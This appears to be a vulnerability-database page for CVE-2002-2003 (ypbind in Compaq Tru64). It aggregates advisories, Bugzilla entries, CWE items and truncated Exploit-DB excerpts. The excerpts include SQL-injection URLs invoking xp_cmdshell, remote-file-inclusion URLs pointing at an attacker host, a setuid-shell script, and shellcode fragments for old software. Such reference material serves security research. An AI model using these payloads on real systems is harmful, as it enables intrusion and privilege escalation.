CVE-2002-2003
Published 2002-12-31

ypbind in Compaq Tru64 4.0F, 4.0G, 5.0A, 5.1 and 5.1A allows remote attackers to cause the process to core dump via certain network packets generated by nmap.

Priority: P4 (17) · medium · CVSS 2.0 score: 5
Vector: AV:N/AC:L/Au:N/C:P/I:N/A:N
EPSS: 1.19% (percentile: 64.2)
Affected
5 ranges (all compaq / tru64; the listing gives no version range or fixed version for any of them)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| compaq | tru64 | — | — |
CVSS provenance
NVD (CVSS v2.0): 5.0 MEDIUM, AV:N/AC:L/Au:N/C:P/I:N/A:N
vendor_redhat: 10.0 CRITICAL
GHSA · ghsa_unreviewed · 2022-04-30
CVE-2002-2003 [MEDIUM] GHSA-2qc3-c6vw-rhw6: ypbind in Compaq Tru64 4
ypbind in Compaq Tru64 4.0F, 4.0G, 5.0A, 5.1 and 5.1A allows remote attackers to cause the process to core dump via certain network packets generated by nmap.
Cisco · vendor_cisco · 2003-04-23
Cisco Secure Access Control Server for Windows Admin Buffer Overflow Vulnerability
Cisco Secure ACS for Windows is vulnerable to a buffer overflow on the administration service which runs on TCP port 2002. Exploitation of this vulnerability results in a Denial of Service, and can potentially result in system administrator access.

Cisco is providing repaired software, and customers are recommended to install patches or upgrade at their earliest opportunity. Workarounds can be implemented, and consist of blocking external access to port 2002 on the ACS.

This issue is documented in Cisco Bug ID CSCea51366. This issue is also being referenced in the Mitre CVE as CAN-2003-0210.
This advisory is available at https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-
Red Hat · vendor_redhat · 2003-03-29 · CVSS 10.0
CVE-2003-0161 [CRITICAL] security flaw
The prescan() function in the address parser (parseaddr.c) in Sendmail before 8.12.9 does not properly handle certain conversions from char and int types, which can cause a length check to be disabled when Sendmail misinterprets an input value as a special "NOCHAR" control value, allowing attackers to cause a denial of service and possibly execute arbitrary code via a buffer overflow attack using messages, a different vulnerability than CVE-2002-1337.
Red Hat · vendor_redhat · 2003-03-19 · CVSS 9.8
CVE-2003-0028 [CRITICAL] security flaw
Integer overflow in the xdrmem_getbytes() function, and possibly other functions, of XDR (external data representation) libraries derived from SunRPC, including libnsl, libc, glibc, and dietlibc, allows remote attackers to execute arbitrary code via certain integer values in length fields, a different vulnerability than CVE-2002-0391.
Cisco · vendor_cisco
CVE-2003-1063: Heap Overflow in Solaris cachefs Daemon
This advisory describes a vulnerability that affects Cisco products and applications that are installed on the Solaris operating system, and is based on the vulnerability of a common service within the Solaris operating system, not due to a defect of the Cisco product or application. A vulnerability in the "cachefs" program was discovered that enables an attacker to execute arbitrary code under Solaris OS. This vulnerability was publicly announced in the CERT Advisory CA-2002-11. All Cisco products and applications that are installed on Solaris OS are considered vulnerable to the underlying operating system vulnerability, unless the workaround was applied. This vulnerability is described in
CWE: CWE-119
No detection rules found.
Exploit-DB · exploitdb · 2010-02-24
CVE-2010-1114 Web Server Creator Web Portal 0.1 - Multiple Vulnerabilities
---
| # Title : Web Server Creator - Web Portal v 0.1 Multi Vulnerability
| # Author : indoushka
| # email : [email protected]
| # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860)
| # Web Site : http://www.comscripts.com/scripts/php.web-server-creator.1082.html
| # Dork : All right reserved 2002-2003 (MSN/Web Server Creator)
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)
| # Bug : Multi
====================== Exploit By indoushka =================================
# Exploit :
1- Directory traversal (Windows)
http://127.0.0.1/1082_webserve-01/news/include/customize.php?l=../../../../../../../../boot.ini
2- XSS
http://127.0.0.1/1082_webserve-01/index.php?pg=forum
3
Exploit-DB · exploitdb · 2006-07-11 · CVSS 9.3
CVE-2006-2389 [CRITICAL] Microsoft Office 2000/2002 - Property Code Execution
---
source: https://www.securityfocus.com/bid/18911/info
Microsoft Office is prone to a code-execution vulnerability. This is due to a failure to handle exceptional conditions.
Successfully exploiting this issue allows attackers to corrupt process memory and to execute arbitrary code in the context of targeted users.
#Microsoft Office Property Code Execution exploit (CVE-2006-2389)
#Author Abhishek Lyall - abhilyall[at]gmail[dot]com, info[at]aslitsecurity[dot]com
#Web - http://www.aslitsecurity.com/
#Blog - http://www.aslitsecurity.blogspot.com/
#Vulnerble application MS office 2003
#Tested on XP SP2 - MS Ofice 2003
#Greets Mila http://contagiodump.blogspot.com, Villy and ASL IT SECURITY TEAM
#!/usr/bin/python
import sys
import zl
Exploit-DB · exploitdb · 2005-12-08
CVE-2005-4131 Microsoft Excel 95/97/2000/2002/2003/2004 - Malformed Range Memory Corruption
---
source: https://www.securityfocus.com/bid/15780/info
Microsoft Excel is susceptible to a remote code-execution vulnerability. This issue was originally disclosed through an eBay auction that has since been terminated.
This issue is due to the application's failure to properly bounds-check user-supplied input data in the 'Named Range' definition in Excel data files. This results in the corruption of critical memory sections, allowing code execution.
The following is a proof-of-concept example segment of an Excel data file. The '*' characters represent the location of the affected value that triggers this issue. Setting these locations to '0xFF' will crash the application.
00000720 00 80 00 ff 93 02 04 00
Exploit-DB · exploitdb · 2005-04-22
CVE-2005-0944 Microsoft Jet Database - 'msjet40.dll' Code Execution (Reverse Shell) (2)
---
##################################################################
# #
# Microsoft Jet (msjet40.dll) Reverse Shell Exploit #
# #
# #
# #
# #
# Based on the exploit written by S.Pearson and #
# Python version by coded by Tal zeltzer #
# #
# XP/sp2 fixed version by Jean Luc #
# #
##################################################################
import sys
import struct
# Addresses are compatible with Windows XP Service Pack 1 and Service Pack 2
# EIP = "\x47\xAD\x05\x30"; # Use this one for MSAccess 2003 (jmp edx)
EIP = "\xF7\x69\x05\x30"; # Use this one MSAccess 2002 (jmp edx)
# EIP = "\xFf\xf7\x07\x30"; # Use this one MSAccess 2000 (jmp edx)
# Reverse Connect Shellcode (From metasploit)
Shellcode_p1 = "\x3
Exploit-DB · exploitdb · 2005-04-11
CVE-2005-0944 Microsoft Jet Database - 'msjet40.dll' DB File Buffer Overflow
---
/*
* --------------------------------------
*
* Microsoft Jet (msjet40.dll) Exploit
*
* --------------------------------------
*
* Author:
* ----------
* S.Pearson
* Computer Terrorism (UK)
* www.computerterrorism.com
* 11/04/2005
*
*
* Credits:
* ----------
* Hexview (original advisory)
*
*
* Tested on:
* -------------
* Windows 2000 SP4 (english)
* Windows XP SP0 (english)
* Windows XP SP1 (english)
*
*
* Requires:
* ------------
* MSAccess offset for stable jmp edx (could use others)
*
* 0x3005AD47 (Microsoft Access 2003)
* 0x300569F7 (Microsoft Access 2002) * DEFAULT *
* 0x3007F7FF (Microsoft Access 2000)
*
*
* Tech Overview:
* ------------------
* Simple exploit based upon Hexview's advisory
* released 01/04/2005.
*
Exploit-DB · exploitdb · 2004-07-12
CVE-2004-0683 Norton AntiVirus - Denial of Service
---
Norton AntiVirus Denial Of Service Vulnerability
*vulnerable [...only tested on!]
Symantec Norton AntiVirus 2003 Professional Edition
Symantec Norton AntiVirus 2002
*not vulnerable
Mcafee 7*
Mcafee 8*
Risk Impact: Medium
Remote: yes
Description:
While having a virus scan [automatic/manual] of some specially crafted compressed files; NAV triggers a DoS using 100% CPU for a very long time. Moreover, NAV is unable to stop the scan in the middle, even if the user wishes to manually stop the virus scan.
Then, in this situation the only alternative is to kill the process.
--- [Proof of Concept] ---
Please download this file.
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/312.zip (av_bomb_3.zip) <--- For symantec.
The
Exploit-DB · exploitdb · 2004-05-16
CVE-2004-0445 Symantec Multiple Firewall - DNS Response Denial of Service
---
/* HOD-symantec-firewall-DoS-expl.c:
*
* Symantec Multiple Firewall DNS Response Denial-of-Service
*
* Exploit version 0.1 coded by
*
*
* .::[ houseofdabus ]::.
*
*
*
* Bug discoveried by eEye:
* http://www.eeye.com/html/Research/Advisories/AD20040512B.html
*
* -------------------------------------------------------------------
* Tested on:
* - Symantec Norton Personal Firewall 2004
*
*
* Systems Affected:
* - Symantec Norton Internet Security 2002
* - Symantec Norton Internet Security 2003
* - Symantec Norton Internet Security 2004
* - Symantec Norton Internet Security Professional 2002
* - Symantec Norton Internet Security Professional 2003
* - Symantec Norton Internet Security Professional 2004
* - Symantec Norton Persona
Exploit-DB · exploitdb · 2003-11-07
CVE-2003-0955 OpenBSD - 'ibcs2_exec' Kernel Code Execution
---
//
// Patch ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.4/common/005_exec.patch
//
#include
#include
#include
#include
/* $OpenBSD: ibcs2_exec.h,v 1.3 2002/03/14 01:26:50 millert Exp $ */
/* $NetBSD: ibcs2_exec.h,v 1.4 1995/03/14 15:12:24 scottb Exp $ */
/*
* Copyright (c) 1994, 1995 Scott Bartram
* All rights reserved.
*
* adapted from sys/sys/exec_ecoff.h
* based on Intel iBCS2
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, t
Exploit-DB · exploitdb · 2003-09-03
CVE-2003-0665 Microsoft Access 97/2000/2002 Snapshot Viewer - ActiveX Control Parameter Buffer Overflow
---
// source: https://www.securityfocus.com/bid/8536/info
Microsoft Access Snapshot Viewer is prone to a remote buffer-overflow condition because the software fails to perform sufficient boundary checks on user-supplied parameters. Presumably, a remote attacker may be able to leverage this issue to execute arbitrary code in the context of the user running the affected Internet Explorer.
/* Microsoft Access Snapshot Viewer ActiveX Control Exploit
Ms-Acees SnapShot Exploit Snapview.ocx v 10.0.5529.0
Download nice binaries into an arbitrary box
Vulnerability discovered by Oliver Lavery
https://www.securityfocus.com/bid/8536/info
Remote: Yes
greetz to str0ke */
#include
#include
#define Filename "
Exploit-DB · exploitdb · 2003-08-02
CVE-2003-1310 Symantec Norton AntiVirus 2002/2003 - Device Driver Memory Overwrite
---
source: https://www.securityfocus.com/bid/8329/info
It has been reported that a memory corruption vulnerability affects the Symantec Norton AntiVirus Device Driver. According to the report, one of the device control operation handlers attempts to write data to an address offset from a pointer parameter passed to DeviceIoControl(). There is no validation on the parameter supplied or the address written to. This vulnerability can be exploited by unprivileged userland programs to crash the affected host or potentially elevate privileges.
;------------------------[NAVAP_EXPLOIT.ASM]--------------------------------------
; NAVAP (Norton AntyVirus Device Driver Exploit)
; powered by Lord YuP / Sec-Labs ^ Tkt
; email: yu
Exploit-DB · exploitdb · 2003-06-01
CVE-2002-0747 IBM AIX 4.3.x/5.1 - 'LSMCODE' Environment Variable Local Buffer Overflow
---
source: https://www.securityfocus.com/bid/7871/info
Insufficient bounds checking in the lsmcode utility will allow locally based attackers to cause memory to be corrupted with attacker-supplied data. As a result, it is possible to exploit this condition to execute arbitrary attacker-supplied instructions with elevated privileges.
#!/usr/bin/perl
# FileName: x_lsmcode_aix4x.pl
# Exploit lsmcode of Aix4.3.3 to get a uid=0 shell.
# Tested : on Aix4.3.3.Mybe can work on other versions.
# Author : [email protected]
# Site : www.xfocus.org www.xfocus.net
# Date : 2003-6-1
# Announce: use as your owner risk!
$CMD="/usr/sbin/lsmcode";
$_=`/usr/bin/oslevel`;
$XID="\x03";
$UID="\x97";
print "\n\nExploit $CMD for A
Exploit-DB · exploitdb · 2003-04-30
CVE-2003-0117 Microsoft BizTalk Server 2002 - HTTP Receiver Buffer Overflow
---
source: https://www.securityfocus.com/bid/7469/info
Microsoft BizTalk Server 2002 contains a boundary condition error that could allow a buffer to be overrun. Successful exploitation could allow arbitrary code execution in the security context of the IIS Server hosting the application.
It is important to note that the HTTP Receiver is an optional component and is not installed by default.
POST /Site/biztalkhttpreceive.dll?XXXX...(more than 250 chars) HTTP/1.0
Exploit-DB · exploitdb · 2003-04-30
CVE-2003-0118 Microsoft BizTalk Server 2000/2002 DTA - 'rawdocdata.asp' SQL Injection
---
source: https://www.securityfocus.com/bid/7470/info
A vulnerability has been reported for BizTalk Server which may make it possible for remote users to modify database query logic. The vulnerability exists in some of the pages used by the DTA interface.
This vulnerability may be the result of inadequate sanitization of user-supplied values for some parameters. A remote attacker may exploit this vulnerability by creating a malicious URL that includes specially crafted SQL queries to execute commands or compromise the database.
http://server/biztalktracking/rawdocdata.asp?nDocumentKey=1,@tnDirection=1;execmaster.dbo.xp_cmdshell 'any OS command'--
http://server/biztalktracking/rawdocdata.asp?nDocumentKey=1,@tnD
Exploit-DB · exploitdb · 2003-04-30
CVE-2003-0118 Microsoft BizTalk Server 2000/2002 DTA - 'RawCustomSearchField.asp' SQL Injection
---
source: https://www.securityfocus.com/bid/7470/info
A vulnerability has been reported for BizTalk Server which may make it possible for remote users to modify database query logic. The vulnerability exists in some of the pages used by the DTA interface.
This vulnerability may be the result of inadequate sanitization of user-supplied values for some parameters. A remote attacker may exploit this vulnerability by creating a malicious URL that includes specially crafted SQL queries to execute commands or compromise the database.
http://server/biztalktracking/RawCustomSearchField.asp?nDocumentKey=1,@tnDirection=1;execmaster.dbo.xp_cmdshell 'any OS command'--
http://server/biztalktracking/RawCustomSearch
Exploit-DB · exploitdb · 2003-04-16
CVE-2002-1468 IBM AIX 4.3.x/5.1 - 'ERRPT' Local Buffer Overflow
---
source: https://www.securityfocus.com/bid/5885/info
The IBM AIX errpt command is prone to a locally exploitable buffer overflow condition. It is possible to exploit this condition to execute arbitrary attacker-supplied instructions with root privileges.
#!/usr/bin/perl
# FileName: x_errpt_aix5.pl
# Exploit command errpt for Aix5L to get a root shell.
# Tested : on Aix5.1
# Author : [email protected]
# Site : www.xfocus.org www.xfocus.net
# Date : 2003-4-16
# Announce: use as your owner risk!
$BUFF="A". "\x7c\xa5\x2a\x79"x500;
#shellcode from lsd-pl and modified by watercloud 2003-4 for Aix5L
$BUFF.="\x7e\x94\xa2\x79\x40\x82\xff\xfd\x7e\xa8\x02\xa6\x3a\xb5\x01\x40";
$BUFF.="\x88\x55\xfe\xe0\x7e\x83\xa3\x78\x3a\xd5\xfe\xe4\x7e\x
Exploit-DB · exploitdb · 2003-03-02
CVE-2002-1337 Sendmail 8.12.x - Header Processing Buffer Overflow (1)
---
// source: https://www.securityfocus.com/bid/6991/info
Sendmail is prone to a remotely exploitable buffer-overflow vulnerability in the SMTP header parsing component. Successful attackers may exploit this vulnerability to gain control of affected servers.
Reportedly, this vulnerability may be locally exploitable if the sendmail binary is setuid/setgid.
Sendmail 5.2 to 8.12.7 are affected. Administrators are advised to upgrade to 8.12.8 or to apply patches to earlier versions of the 8.12.x tree.
/*## copyright LAST STAGE OF DELIRIUM mar 2003 poland *://lsd-pl.net/ #*/
/*## sendmail 8.11.6 #*/
/* proof of concept code for remote sendmail vulnerability */
/* usage: linx86_sendmail target [-l localaddr] [-b localport] [-p ptr] */
/* [-c co
Exploit-DB · exploitdb · 2003-02-20
CVE-2003-0100 Cisco IOS 11/12 - OSPF Neighbor Buffer Overflow
---
// source: https://www.securityfocus.com/bid/6895/info
Cisco IOS is prone to a remotely exploitable buffer overflow condition when handling malformed OSPF (Open Shortest Path First) packets. The overflow occurs when more than 255 OSPF neighbors are announced. This may make it possible to execute malicious instructions on a device running a vulnerable version of the software. Denial of service is also possible.
/* Cisco IOS IO memory exploit prove of concept
* by FX of Phenoelit
* http://www.phenoelit.de
*
* For:
* 19C3 Chaos Communication Congress 2002 / Berlin
* BlackHat Briefings Seattle 2003
*
* Cisco IOS 11.2.x to 12.0.x OSPF neighbor overflow
* Cisco Bug CSCdp58462 causes more than 255 OSPF neighbors to overflow a IO memory
* str
Exploit-DB · exploitdb · 2003-02-12
CVE-2003-1359 HP-UX 10.x - stmkfont Alternate Typeface Library Buffer Overflow (1)
---
// source: https://www.securityfocus.com/bid/6836/info
A buffer overflow vulnerability has been reported in the stmkfont utility shipped with HP-UX systems. The problem occurs due to insufficient bounds checking on user-supplied data to the alternate typeface library command-line option.
A local attacker may be able to exploit this issue to execute arbitrary code with elevated privileges.
All Avaya PDS 9 and 11 platforms are vulnerable to this issue. Avaya PDS 12 platforms running on HP-UX 11.00 are vulnerable as well. PDS 12 versions running on HP-UX 11.11 are not vulnerable.
/*## copyright LAST STAGE OF DELIRIUM jun 2002 poland *://lsd-pl.net/ #*/
/*## /usr/bin/stmkfont #*/
#include
#include
#include
#define
Exploit-DB · exploitdb · 2003-02-12
CVE-2003-1358 HP-UX 10.x - rs.F3000 Unauthorized Access
---
source: https://www.securityfocus.com/bid/6837/info
The rs.F3000 binary is prone to an issue that may allow attackers to obtain unauthorized access to a vulnerable system. A denial of service attack is also possible. This is due to multiple instances of the system() function being used in an unsafe manner.
#!/bin/sh
## copyright LAST STAGE OF DELIRIUM may 2002 poland *://lsd-pl.net/ #
## /usr/lib/X11/Xserver/ucode/screens/hp/rs.F3000 #
echo "copyright LAST STAGE OF DELIRIUM may 2002 poland //lsd-pl.net/"
echo "/usr/lib/X11/Xserver/ucode/screens/hp/rs.F3000 for HP-UX 10.20 700/800"
cat > /tmp/rm << 'EOF'
/usr/bin/cp /bin/sh /tmp/sh
/usr/bin/chown daemon /tmp/sh
/usr/bin/chmod 4755 /tmp/sh
EOF
chmod 755 /tmp/rm
PATH=/tmp:$PATH
export PATH
Exploit-DB · exploitdb · 2003-01-02
CVE-2003-1251 N/X Web Content Management System 2002 Prerelease 1 - 'menu.inc.php?c_path' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/6500/info
N/X Web Content Management System is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers.
An attacker may exploit this by supplying a path to a maliciously created file, located on an attacker-controlled host as a value for some parameters.
If the remote file is a PHP script, this may allow for execution of attacker-supplied PHP code with the privileges of the webserver. Successful exploitation may provide local access to the attacker.
http://[target]/nx/common/cds/menu.inc.php?c_path=http://[attacker]/
with :
http://[attacker]/common/lib/launch.inc.php
Exploit-DB · exploitdb · 2003-01-02
CVE-2003-1251 N/X Web Content Management System 2002 Prerelease 1 - 'datasets.php?c_path' Local File Inclusion
---
source: https://www.securityfocus.com/bid/6500/info
N/X Web Content Management System is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers.
An attacker may exploit this by supplying a path to a maliciously created file, located on an attacker-controlled host as a value for some parameters.
If the remote file is a PHP script, this may allow for execution of attacker-supplied PHP code with the privileges of the webserver. Successful exploitation may provide local access to the attacker.
http://[target]/nx/common/dbo/datasets.php?c_path=http://[attacker]/
with :
http://[attacker]/common/dbo/saveset.php
http://[attacker]/common/dbo/rec
Exploit-DB · exploitdb · 2002-12-19
CVE-2002-1368 CUPS 1.1.x - Negative Length HTTP Header
---
source: https://www.securityfocus.com/bid/6437/info
A vulnerability has been reported for CUPS that, if exploited, may result in a DoS or the execution of code on affected systems.
An attacker can exploit this vulnerability by connecting to a vulnerable system and issuing malformed HTTP headers with a negative value for some fields. When the cupsd service receives this request, it will crash.
This vulnerability is very similar to the issue described in BID 5033. It may be very likely that this vulnerability may be exploited to execute malicious attacker-supplied code on BSD, and possibly other, platforms.
*** January 05, 2003
There are reports of this vulnerability being actively exploited in the wild. Vulnerable users are advised to update i
Exploit-DB · exploitdb · 2002-12-11
CVE-2003-0089 HP-UX 11 - Software Distributor Lang Environment Variable Local Buffer Overrun
---
// source: https://www.securityfocus.com/bid/8986/info
HP has reported that some Software Distributor (SD) utilities are prone to a locally exploitable buffer-overrun vulnerability. Affected utilities include swinstall(1M) and swverify(1M).
/*
Program : x_hpux_11i_sw.c
Use : HP-UX 11.11/11.0 exploit swxxx to get local root shell.
Complie : cc x_hpux_11i_sw.c -o x_sw ;./x_sw ( not use gcc for some system)
Usage : ./x_sw [ off ]
Tested : HP-UX B11.11 & HP-UX B11.0
Author : watercloud [@] xfocus.org
Date : 2002-12-11
Note : Use as your own risk !!
*/
#include
#define T_LEN 2124
#define BUFF_LEN 1688
#define NOP 0x0b390280
char shellcode[]=
"\x0b\x5a\x02\x9a\x34\x16\x03\xe8\x20\x20\x08\x01\xe4\x20\xe0\x08"
"
Exploit-DB · exploitdb · 2002-12-10
CVE-2002-1349 Trend Micro PC-cillin 2000/2002/2003 - Mail Scanner Buffer Overflow
---
source: https://www.securityfocus.com/bid/6350/info
A buffer overflow vulnerability has been reported for PC-cillin's mail scanning utility.
An attacker can exploit this vulnerability by connecting to a vulnerable pop3trap.exe service and sending an overly long string. This will result in the process crashing and allowing the attacker to gain control over the execution of the process.
#!/usr/bin/perl
#pc-cillin DOS..will add shellcode l8r..
use IO::Socket;
$buf = 1100;
$host = $ARGV[0];
$port = $ARGV[1];
#shellcode needs to be modded..
#return addr is in the shellcode; doesn't work? go figure..
$hellcode = "\xF0\x00\x00\x00\x58\x55\x89\xE5\x81\xEC\x2C\x00\x00\x00\x89\x45\xD4\xC7\x45\xFC".
"\x00\x00\xE7\x77\x8B
Bugzilla · bugzilla · 2018-08-16 · CVSS 10.0
CVE-2003-0161 [CRITICAL] security flaw
Flaw bug created to hold information about an old flaw we knew something about. For more details see the MITRE CVE description.
Discussion:
MITRE description:
The prescan() function in the address parser (parseaddr.c) in Sendmail before 8.12.9 does not properly handle certain conversions from char and int types, which can cause a length check to be disabled when Sendmail misinterprets an input value as a special "NOCHAR" control value, allowing attackers to cause a denial of service and possibly execute arbitrary code via a buffer overflow attack using messages, a different vulnerability than CVE-2002-1337.
Bugzilla · bugzilla · 2018-08-16 · CVSS 9.8
CVE-2003-0028 [CRITICAL] security flaw
Flaw bug created to hold information about an old flaw we knew something about. For more details see the MITRE CVE description.
Discussion:
MITRE description:
Integer overflow in the xdrmem_getbytes() function, and possibly other functions, of XDR (external data representation) libraries derived from SunRPC, including libnsl, libc, glibc, and dietlibc, allows remote attackers to execute arbitrary code via certain integer values in length fields, a different vulnerability than CVE-2002-0391.
Bugzilla · bugzilla · 2007-05-09 · CVSS 5.0
CVE-2005-3164 [MEDIUM] A number of tomcat issues
A number of issues affected tomcat 4.0.6 as distributed with Stronghold. Most of these are minor severity, all need triaging:
http://tomcat.apache.org/security-4.html
Information disclosure CVE-2005-3164
Information disclosure CVE-2005-2090
Directory traversal CVE-2007-0450
Cross-site scripting CVE-2007-1358
Cross-site scripting CVE-2006-7196
Directory listing CVE-2006-3835
Cross-site scripting CVE-2005-4838
Denial of service CVE-2005-3510
Denial of service CVE-2003-0866
Information disclosure CVE-2002-2006
Discussion:
closing; Stronghold has reached end of life.
Bugzilla · bugzilla · 2004-03-20
[MEDIUM] CAN-2003-0977 fix pushed for RH9, but not FC1
Description of problem:
CAN-2003-0977 fix pushed for RH9, but not FC1
Version-Release number of selected component (if applicable):
cvs-1.11.5-3
Additional info:
https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=111221#c5
https://rhn.redhat.com/errata/RHSA-2004-003.html
http://ccvs.cvshome.org/servlets/NewsItemView?newsID=84
http://archives.neohapsis.com/archives/vulnwatch/2002-q2/0081.html
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0977
Discussion:
A rebuild from cvs-1.11.11-1 (or higher) from Fedora Development
at Fedora Core 1 solves the problem, so maybe one of the Red Hat
maintainers could do that? Would be very nice :)
BTW: Maybe the kerberos 4 support has to be disabled.
---
Maybe that issue is fixed soon by one of
Bugzilla · bugzilla · 2003-11-24
[MEDIUM] CAN-2002-1565 Wget buffer overflow
A buffer overflow in the url_filename function for wget 1.8.1 allows attackers to cause a segmentation fault via a long URL. Red Hat does not believe that this issue is exploitable to allow an attacker to be able to run arbitrary code. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CAN-2002-1565 to this issue.
RHSA-2003:372 in progress
Discussion:
An errata has been issued which should help the problem described in this bug report.
This report is therefore being closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files, please follow the link below. You may reopen
this bug report if the solution does not work for you.
http://rhn.redhat.com/errata/RHSA-2003-3
Bugzilla · bugzilla · 2002-12-06
[MEDIUM] SquirrelMail 1.2.8 vulnerable to XSS attacks
An incomplete fix for a cross-site scripting (XSS) vulnerability in SquirrelMail 1.2.8 calls the strip_tags function on the PHP_SELF value but does not save the result back to that variable, leaving it open to cross-site scripting attacks.
This bug has been designated CAN-2002-1276.
Discussion:
Isn't this a dup of 78982?
---
No (check the CVEs).
---
An errata has been issued which should help the problem described in this bug report.
This report is therefore being closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files, please follow the link below. You may reopen
this bug report if the solution does not work for you.
http://rhn.redhat.com/errata/RHSA-2003-042.html
CWE · mitre_cwe · CVSS 5.0
CVE-2002-1532 [MEDIUM] CWE-239: Failure to Handle Incomplete Element
The product does not properly handle when a particular element is not completely specified.
Modes of Introduction:
Phase: Implementation
Common Consequences:
Scope: Integrity, Other. Impact: Varies by Context, Unexpected State.
Observed Examples:
CVE-2002-1532: HTTP GET without \r\n\r\n CRLF sequences causes product to wait indefinitely and prevents other users from accessing it.
CVE-2003-0195: Partial request is not timed out.
CVE-2005-2526: MFV. CPU exhaustion in printer via partial printing request then early termination of connection.
CVE-2002-1906: CPU consumption by sending incomplete HTTP requests and leaving the connections open.
CWE · mitre_cwe · CVSS 2.1
CVE-2002-1976 [LOW] CWE-439: Behavioral Change in New Version or Environment
A's behavior or functionality changes with a new version of A, or a new environment, which is not known (or manageable) by B.
Modes of Introduction:
Phase: Architecture and Design
Phase: Implementation
Common Consequences:
Scope: Other. Impact: Quality Degradation, Varies by Context.
Observed Examples:
CVE-2002-1976: Linux kernel 2.2 and above allow promiscuous mode using a different method than previous versions, and ifconfig is not aware of the new method (alternate path property).
CVE-2005-1711: Product uses defunct method from another product that does not return an error code and allows detection avoidance.
CVE-2003-0411: chain: Code was ported from a case-sensitive Unix platform to a case-insensitive Windows platform where
CWE · mitre_cwe · CVSS 4.6
[MEDIUM] CWE-422: Unprotected Windows Messaging Channel ('Shatter')
The product does not properly verify the source of a message in the Windows Messaging System while running at elevated privileges, creating an alternate channel through which an attacker can directly send a message to the product.
Modes of Introduction:
Phase: Architecture and Design
Common Consequences:
Scope: Access Control. Impact: Gain Privileges or Assume Identity, Bypass Protection Mechanism.
Potential Mitigations:
[Architecture and Design] Always verify and authenticate the source of the message.
Observed Examples:
CVE-2002-0971: Bypass GUI and access restricted dialog box.
CVE-2002-1230: Gain privileges via Windows message.
CVE-2003-0350: A control allows a change to a pointer for a callback function using Windows mess